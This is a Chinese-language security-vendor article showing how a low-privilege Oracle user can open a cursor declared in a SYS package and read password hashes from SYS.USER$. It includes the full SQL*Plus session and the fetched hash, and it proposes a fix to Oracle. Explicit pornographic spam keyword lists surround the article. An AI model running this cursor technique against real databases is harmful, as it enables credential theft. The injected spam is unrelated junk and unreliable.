欧美精品一区二区,体育生GAY白袜调教VIDEO,私人影院播放器,色偷偷AV老熟女色欲涩爱

?
內(nèi)容中心
按關(guān)鍵字查找
Oracle數(shù)據(jù)庫游標(biāo)帶來的安全隱患之游標(biāo)設(shè)計本身的安全隱患
作者:安華金和 發(fā)布時間:2017-01-21

前文我們介紹了兩種Oracle游標(biāo)的數(shù)據(jù)庫安全隱患,一是利用游標(biāo)的掛起狀態(tài)進行惡意代碼注入,二是利用惡意代碼注入進行提權(quán),其實通過游標(biāo)獲取高權(quán)限賬號的密碼完全不用這么麻煩,oracle在游標(biāo)設(shè)計上本身就有安全問題。

用高權(quán)限用戶寫一個包,這個包中放入一個游標(biāo),功能和前面用的schina_test是一致的。用來取回需要檢查賬號的hash。然后和我們給出的一組預(yù)設(shè)hash做對比。低權(quán)限用戶如果知道這個游標(biāo)可以直接在包外調(diào)用該游標(biāo),從而獲取游標(biāo)中的內(nèi)容。包內(nèi)游標(biāo)可以在包外被調(diào)用,這是oracle游標(biāo)本身設(shè)計上的安全缺陷。

SQL> connect / as sysdba

已連接。

SQL>  CREATE OR REPLACE PACKAGE schina AS

  2   CURSOR X (USERNAME IN VARCHAR2) IS SELECT PASSWORD FROM SYS.USER$

  3  WHERE NAME=USERNAME;

  4   PROCEDURE CHECK_PASSWORD;

  5   END;

  6   /


程序包已創(chuàng)建。


SQL> CREATE OR REPLACE PACKAGE BODY schina AS

  2  PROCEDURE CHECK_PASSWORD IS

  3  PASSWORD VARCHAR2(200);

  4  BEGIN

  5  OPEN X (USER());

  6  FETCH X INTO PASSWORD;

  7  CLOSE X;

  8    IF PASSWORD = '01234567890ABCDEF' THEN

  9       DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS NOT OK');

 10  ELSE

 11       DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS OK');

 12  END IF;

 13  END CHECK_PASSWORD;

 14  END;

 15   /

程序包體已創(chuàng)建。

SQL> show errors

沒有錯誤。

SQL> GRANT EXECUTE ON SYS.SCHINA TO PUBLIC;

授權(quán)成功。

    通過show errors檢驗發(fā)現(xiàn)整個過程沒有X游標(biāo)掛起的問題。X游標(biāo)正常關(guān)閉了,到現(xiàn)在為止操作一切正常切換到低權(quán)限賬號

SQL> connect scott/tiger

已連接。

SQL> set serveroutput on

SQL> exec  sys.schina.check_password;

YOUR PASSWORD HASH IS OK

    執(zhí)行包返回的結(jié)果很安全,不會顯示出游標(biāo)內(nèi)存儲的內(nèi)容,但如果通過一個匿名塊,在包外使用游標(biāo)的結(jié)果就變得不安全了,低權(quán)限用戶可以輕易使用高權(quán)限用戶設(shè)置的游標(biāo)。通過游標(biāo)直接可以獲取到游標(biāo)中存儲的結(jié)果集。

SQL> DECLARE PASSWORD VARCHAR2(200);

  2  BEGIN OPEN SYS. SCHINA.X ('SYS');

  3  FETCH SYS. SCHINA.X INTO PASSWORD;

  4  CLOSE SYS. SCHINA.X;

  5  DBMS_OUTPUT.PUT_LINE('The SYS password is '|| PASSWORD);

  6  END;

  7  /

The SYS password is CF10653F66A74AC2

任何權(quán)限賬號的密碼通過這種方式都會被低權(quán)限用戶直接獲取HASH值,然后通過HASH逆向工具,獲取全部賬號的密碼。

至此我們對我們已經(jīng)分析了3種Oracle數(shù)據(jù)庫游標(biāo)帶來的安全隱患。游標(biāo)作為oracle的核心子程序,安全性十分重要。oracle的游標(biāo)雖然解決了一些問題,但安全性上還有很大問題。安華金和建議Oracle給游標(biāo)一個參數(shù),作為安全參數(shù)。默認打開安全參數(shù),當(dāng)游標(biāo)在其被定義的包外打開的時候,對游標(biāo)進行強制檢查,一旦發(fā)現(xiàn)打開該游標(biāo)的用戶權(quán)限低于創(chuàng)建游標(biāo)者的權(quán)限,則直接拋出異常,禁止打開該游標(biāo),從而保證Oracle數(shù)據(jù)庫安全性。


?
吃了他达拉非太硬还需要继续吃吗| 大肉大捧一进一出| 狂躁美女大bbbbbb糟蹋| 狠狠五月色婷婷蜜桃777| 情欲情欲欲超市全文无删减| 天堂√最新版中文在线| 俄罗斯少妇性做爰片| 超碰caoporen97人人| 在线免费看电影| 小浪货好大的奶好爽| 国产视频在线观看| 男男色情gay浴室激情| 亚洲中文无码亚洲人成软件| 被多个强壮的黑人灌满浆| 国产精品人人妻人色五月| 男人狂桶女人高潮完整过程| 被医生绑在妇科椅调教| 国内最真实的xxxx人伦| 国产片+人+综合+亚洲区| 国产欧美综合系列在线| 成人在线电影| 国产免费观看久久黄av片| 69久久国产露脸精品国产| 国内老熟妇对白hdxxxx| 无码中文字幕一区二区三区| 欧美a级suv大全| 粉嫩被两个粗黑疯狂进出| 色窝窝无码一区二区三区成人网站| www夜插内射视频网站| A片在线观看| 国产成人精品一区二区三区视频 | 可脱卸衣服的游戏| 做床的全部过程视频| 色翁荡息又大又硬又粗又爽小玲| gogogo高清在线播放| 久久久国产一区二区三区四区小说| 狂躁女人双腿流白色液体| 妈妈的朋友4在线观看| zo0o与人xxx欧美另类| 局长人妻互换不带套| 与亲女洗澡时伦了毛片|